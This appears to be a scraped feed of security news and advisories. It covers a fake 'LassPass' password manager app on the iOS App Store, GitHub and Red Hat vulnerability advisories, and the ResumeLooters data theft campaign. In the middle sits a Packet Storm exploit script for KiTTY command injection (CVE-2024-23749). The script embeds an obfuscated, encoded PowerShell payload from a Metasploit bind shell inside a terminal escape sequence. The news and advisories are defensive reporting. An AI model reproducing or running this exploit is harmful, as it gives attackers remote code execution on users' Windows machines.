By Waqas
Remember, it is LastPass Password Manager, not LassPass Password Manager!
This is a post from HackRead.com Read the original post: Fake LastPass Password Manager App Lurks on iOS App Store

The popular LastPass Password Manager application has warned iOS users about a fraudulent app exploiting the app’s name circulating on the official Apple App Store.

Attention, LastPass users! A cunning imposter has infiltrated the iOS App Store, posing as the legitimate **LastPass Password Manager** app. This fake app, aptly named “LassPass Password Manager,” seeks to deceive users and potentially steal their sensitive login credentials.

Despite slight alterations to the logo and name, the fake LastPass app operates seamlessly to scam unsuspecting users into downloading it, as its colour scheme and font closely mimic those of the original LastPass app.

It all began on February 7, 2024, when LastPass published a **blog post** warning unsuspecting users to remain vigilant and avoid downloading a fraudulent application. Despite LastPass’s report, the app remains available on the App Store and is developed by an individual using the name Parvati Patel. Interestingly, the developer also has another app on their account, a community service app for India, hinting at their location.

Just to clarify, the LastPass password manager app is owned by GoTo, formerly known as LogMeIn Inc. Therefore, the official app lists LogMeIn Inc., as its developer on the Apple App Store.

Fake LastPass Password Manager app called LassPass Password Manager App (left) – Authentic LastPass Password Manager app (right) (Screenshots: Hackread.com)

****IN SUMMARY****

*   **The fake app:** The app is called “LassPass Password Manager” and is listed under the developer name Parvati Patel.
*   **Mimicking tactics:** The app closely copies LastPass’ branding and user interface, even using similar screenshots, to potentially mislead users into downloading it.
*   **Potential dangers:** If downloaded, the fake app could steal your login credentials and other sensitive information.
*   **Action taken:** LastPass is actively working to get the app removed from the App Store and is urging users to be cautious.

The fake app can be seen **here**, while the authentic one can be downloaded from **here**.

Nevertheless, this isn’t the first instance of a fake app mimicking a popular developer making its way onto the Apple App Store. **In July 2023**, Apple approved a fake THREADS app, which later surged to number 1 on the Apple Store in Europe. Interestingly, the original THREADS app had been launched by META just a few days prior to the incident and was not yet available in Europe when the fake one appeared in the store.

****RELATED ARTICLES****

1.  **Google Deletes Fake BatteryBot Pro Malware App**
2.  **Scylla Ad Fraud Attack on iOS Users Halted by Apple**
3.  **Apple removes Clearview AI iPhone app from App Store**
4.  **Apple removes anti-virus apps from store for “stealing data”**
5.  **Google removes ClearURLs Chrome extension from app store**
6.  **Google Removes Swing VPN Android App Exposed as DDoS Botnet**

Fake LastPass Password Manager App Lurks on iOS App Store

### Impact

Any user could get a token that has been requested by another user/agent

### Patches
The vulnerability is fixed in version 8.0.37.

### Workarounds

None

### References


**DIRAC's TokenManager does not check permissions on cached tokens**

Critical severity GitHub Reviewed Published Feb 8, 2024 in DIRACGrid/DIRAC • Updated Feb 8, 2024

GHSA-59qj-jcjv-662j: DIRAC's TokenManager does not check permissions on cached tokens

xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.

**XXL-JOB vulnerable to Server-Side Request Forgery**

Moderate severity GitHub Reviewed Published Feb 8, 2024 to the GitHub Advisory Database • Updated Feb 8, 2024

GHSA-c352-x843-ggpq: XXL-JOB vulnerable to Server-Side Request Forgery

KiTTY versions 0.76.1.13 and below suffer from a command injection vulnerability when getting a remote file through scp. It appears to leverage an ANSI escape sequence issue which is quite an interesting vector of attack.

    #!/usr/bin/python#----------------------------------------------------------------------------------------## Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY                    ##        Get Remote File Through SCP Input (CVE-2024-23749)                              ## OS: Microsoft Windows 11/10/8/7/XP                                                     ## Author: DEFCESCO (Austin A. DeFrancesco)                                               ## Software:                                                                              ## https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip    ##----------------------------------------------------------------------------------------## More details can be found on my blog: https://blog.DEFCESCO.io/Hell0+KiTTY             ##----------------------------------------------------------------------------------------## msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             ## [*] Payload Handler Started as Job 1                                                   ## msf6 payload(cmd/windows/powershell_bind_tcp) >                                        ## [*] Started bind TCP handler against 192.168.100.28:4444                               ## [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) ##----------------------------------------------------------------------------------------#import osimport sys#-----------------------------------------------------------------## msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw ##-----------------------------------------------------------------#shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'shellcode += b'ess))).ReadToEnd()))\"'escape_sequence = b'\033]0;__rv:'escape_sequence += b'" & 'escape_sequence += shellcodeescape_sequence += b' #\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence)stdout.flush()

KiTTY 0.76.1.13 Command Injection

LastPass has warned about a fake app called LassPass, available in the Apple App Store.

Password Manager LastPass has warned about a fraudulent app called “LassPass Password Manager” which it found on the Apple App Store.

The app closely mimics the branding and appearance of LastPass, right down to the interface. So, even if the name was a “happy accident” it seems clear that this was a purposeful attempt to trick users installing the fake app.

The fake app can be recognized not only by the name, but other misspellings in the screenshots, and the app lists Parvati Patel as the developer and the privacy policy as hosted at bluneel\[.\]com. The developer of the legitimate LastPass app is LogMeIn, Inc. 

While using a genuine password manager provides extra security, entrusting your passwords to an app that is a rip-off does not. Obviously, storing all your passwords in an app that is not trustworthy can get you in all kinds of trouble, including identity theft.

We have not tested if the app sends your passwords to a third-party, but we should assume that it does just that.

In the App Store the impersonator claims to be “Trusted by over 1+ million users and 10,000+ businesses” which clearly can’t be right and was most certainly copied from LastPass.

LastPass states that it is:

> “… actively working to get this application taken down as soon as possible, and will continue to monitor for fraudulent clones of our applications and/or infringements upon our intellectual property“

But at the time of writing the app was still available in the Apple App Store.

Malwarebytes Premium and Malwarebytes Browser Guard block the domain bluneel\[.\]com so users will see a warning about the trustworthiness of the app.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Warning from LastPass as fake app found on Apple App Store 

Red Hat Security Advisory 2024-0733-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include an information leakage vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0733.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update  
Advisory ID:        RHSA-2024:0733-03  
Product:            Red Hat Ansible Automation Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0733  
Issue date:         2024-02-07  
Revision:           03  
CVE Names:          CVE-2023-43804  
====================================================================

Summary: 

An update is now available for Red Hat Ansible Automation Platform 2.4

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.

Security Fix(es):

* ansible-core: possible information leak in tasks that ignore ANSIBLE_NO_LOG configuration (CVE-2024-0690)

* automation-controller: urllib3: Cookie request header isn't stripped during cross-origin (CVE-2023-43804)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Updates and fixes for automation controller:  
* Fixed jobs stuck in pending state after connection to database recover (AAP-19618)  
* Added secure flag option for userLoggedIn cookie if 'SESSION_COOKIE_SECURE' is set to 'True' (AAP-19602)  
* Fixed 'twilio_backend.py' to send SMS to multiple destinations (AAP-19284)  
* Fixed rsyslogd from unexpectedly stop sending events to Splunk HTTP Collector and recover rsyslog from 4xx errors (AAP-19069)  
* Fixed a TypeError in the  Logging Settings Edit form of the automation controller user interface to no longer render the form inputs inaccessible (AAP-18960)  
* Fixed Delinea (previously: Thycotic) DevOps Secrets Vault credential plugin to work with python-dsv-sdk>=1.0.4 (AAP-18701)  
* Updated schedule Prompt on launch fields to persist while editing (AAP-13859)  
* automation-controller has been updated to 4.5.1

Note: The 2.4-5 installer/setup should be used to update automation controller to 4.5.1

Updates and fixes for ansible-core:  
* ansible-core has been updated to 2.15.9

Updates and fixes for installer, setup and setup bundle:  
* Fixed the version check when pinning EDA to an older version (AAP-19399)  
* Fixed rsyslogd from unexpectedly stop sending events to Splunk HTTP Collector and recover rsyslog from 4xx errors (AAP-19069)  
* Automation Hub now uses system crypto-policies in nginx (AAP-18974)  
* installer, setup and setup bundle have been updated to 2.4-5

Additionally, setup bundle 2.4-5 includes the updates released in the following advisories:

RHSA-2024:0322  
* python3-dynaconf/python39-dynaconf 3.1.12-2  
* python3-gitpython/python39-gitpython 3.1.40  
* python3-twisted/python39-twisted 23.10.0

RHBA-2023:7863  
* container images

Solution:

CVEs:

CVE-2023-43804

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/errata/RHSA-2024:0322  
https://access.redhat.com/errata/RHBA-2023:7863  
https://bugzilla.redhat.com/show_bug.cgi?id=2242493  
https://bugzilla.redhat.com/show_bug.cgi?id=2259013

Red Hat Security Advisory 2024-0733-03

Red Hat Security Advisory 2024-0729-03 - Red Hat Advanced Cluster Management for Kubernetes 2.7.11 General Availability release images, which provide security updates and fix bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0729.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Advanced Cluster Management 2.7.11 security and bug fix container update  
Advisory ID:        RHSA-2024:0729-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0729  
Issue date:         2024-02-08  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.7.11 General  
Availability release images, which provide security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.7.11 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following Release Notes documentation for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/release_notes/

Security fix(es):  
CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS on  
go-git clients  
CVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to path  
traversal and RCE on go-git clients

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/install/installing

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0729-03

Red Hat Security Advisory 2024-0642-03 - An update is now available for Red Hat OpenShift Container Platform 4.14. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0642.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.14.11 bug fix and security update  
Advisory ID:        RHSA-2024:0642-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0642  
Issue date:         2024-02-07  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.11. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:0645

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)

* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/OCPBUGS-11385  
https://issues.redhat.com/browse/OCPBUGS-21795  
https://issues.redhat.com/browse/OCPBUGS-21812  
https://issues.redhat.com/browse/OCPBUGS-22315  
https://issues.redhat.com/browse/OCPBUGS-23395  
https://issues.redhat.com/browse/OCPBUGS-23498  
https://issues.redhat.com/browse/OCPBUGS-23500  
https://issues.redhat.com/browse/OCPBUGS-23738  
https://issues.redhat.com/browse/OCPBUGS-24307  
https://issues.redhat.com/browse/OCPBUGS-24315  
https://issues.redhat.com/browse/OCPBUGS-24401  
https://issues.redhat.com/browse/OCPBUGS-24423  
https://issues.redhat.com/browse/OCPBUGS-24521  
https://issues.redhat.com/browse/OCPBUGS-24660  
https://issues.redhat.com/browse/OCPBUGS-25081  
https://issues.redhat.com/browse/OCPBUGS-25352  
https://issues.redhat.com/browse/OCPBUGS-25800  
https://issues.redhat.com/browse/OCPBUGS-26238  
https://issues.redhat.com/browse/OCPBUGS-26553  
https://issues.redhat.com/browse/OCPBUGS-26568  
https://issues.redhat.com/browse/OCPBUGS-26597  
https://issues.redhat.com/browse/OCPBUGS-27178  
https://issues.redhat.com/browse/OCPBUGS-27193  
https://issues.redhat.com/browse/OCPBUGS-27243  
https://issues.redhat.com/browse/OCPBUGS-27256  
https://issues.redhat.com/browse/OCPBUGS-27275  
https://issues.redhat.com/browse/OCPBUGS-27305  
https://issues.redhat.com/browse/OCPBUGS-27350  
https://issues.redhat.com/browse/OCPBUGS-27362  
https://issues.redhat.com/browse/OCPBUGS-27369  
https://issues.redhat.com/browse/OCPBUGS-27471  
https://issues.redhat.com/browse/OCPBUGS-27485  
https://issues.redhat.com/browse/OCPBUGS-27759  
https://issues.redhat.com/browse/OCPBUGS-27822  
https://issues.redhat.com/browse/OCPBUGS-27851  
https://issues.redhat.com/browse/OCPBUGS-27858  
https://issues.redhat.com/browse/OCPBUGS-28200  
https://issues.redhat.com/browse/OCPBUGS-28249  
https://issues.redhat.com/browse/OCPBUGS-28382  
https://issues.redhat.com/browse/OCPBUGS-28608

Red Hat Security Advisory 2024-0642-03

Red Hat Security Advisory 2024-0641-03 - An update is now available for Red Hat OpenShift Container Platform 4.14. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0641.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.14.11 security and extras update  
Advisory ID:        RHSA-2024:0641-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0641  
Issue date:         2024-02-07  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.14.11. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:0642

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)

* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/OCPBUGS-26237

Red Hat Security Advisory 2024-0641-03

A criminal group called ResumeLooters has stolen the personal information of over two million job seekers from at least 65 different websites.

A cybercriminal group known as ResumeLooters has infiltrated 65 job listing and retail websites, compromising the personal data of over two million job seekers.

The group used SQL injection and cross-site scripting (XSS) attacks—both common techniques— to extract the sensitive information from the websites.

The attacks primarily focused on the Asia-Pacific (APAC) region, targeting sites in Australia, Taiwan, China, Thailand, India, and Vietnam. However, other compromised companies were located in other regions, including Brazil, Italy, Mexico, Russia, Turkey, and the US.

Researchers first detected the activity of the group in November 2023, and tracked the massive malicious campaign targeting employment agencies and retail companies. Due to the criminals’ focus on job search platforms and the theft of resumes, the researchers dubbed the group ResumeLooters.

The stolen data is hard to quantify given the amount of sources, but it may include names, phone numbers, emails, and dates of birth, as well as information about job seekers’ experience, employment history, and other sensitive personal data.

The stolen data were put up for sale on Chinese-speaking Telegram channels. This and other indicators make it very likely that the group is of Chinese origin.

If you want to find out how much of your own data is exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

Tag

#git